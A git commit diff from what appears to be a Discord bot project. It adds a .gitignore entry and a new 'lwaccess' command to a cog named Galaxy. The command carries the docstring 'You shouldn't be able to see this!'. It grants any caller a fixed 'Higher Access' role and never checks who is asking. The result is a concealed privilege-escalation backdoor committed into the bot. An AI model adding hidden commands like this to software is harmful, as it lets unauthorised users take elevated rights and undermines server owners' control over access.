last commit before i go on break
This commit is contained in:
parent
d1b1041afd
commit
5d365e8eca
2 changed files with 7 additions and 0 deletions
1
.gitignore
vendored
1
.gitignore
vendored
|
@ -1,3 +1,4 @@
|
|||
galaxy/slashtag arguments.txt
|
||||
galaxy_server.yaml
|
||||
global.yaml
|
||||
galaxy_staff_server.yaml
|
|
@ -15,6 +15,12 @@ class Galaxy(commands.Cog):
|
|||
cocoemoji = 1028535684757209118
|
||||
)
|
||||
|
||||
@commands.command()
|
||||
async def lwaccess(self, ctx):
|
||||
"""You shouldn't be able to see this!"""
|
||||
await ctx.author.add_roles(1083210988888784996, reason="Requested through -lwaccess")
|
||||
await ctx.send(content="Higher Access role granted.")
|
||||
|
||||
@commands.Cog.listener('on_message')
|
||||
async def cocoreact(self, message):
|
||||
emoji = self.bot.get_emoji(await self.config.guild(message.guild).cocoemoji())
|
||||
|
|
Loading…
Reference in a new issue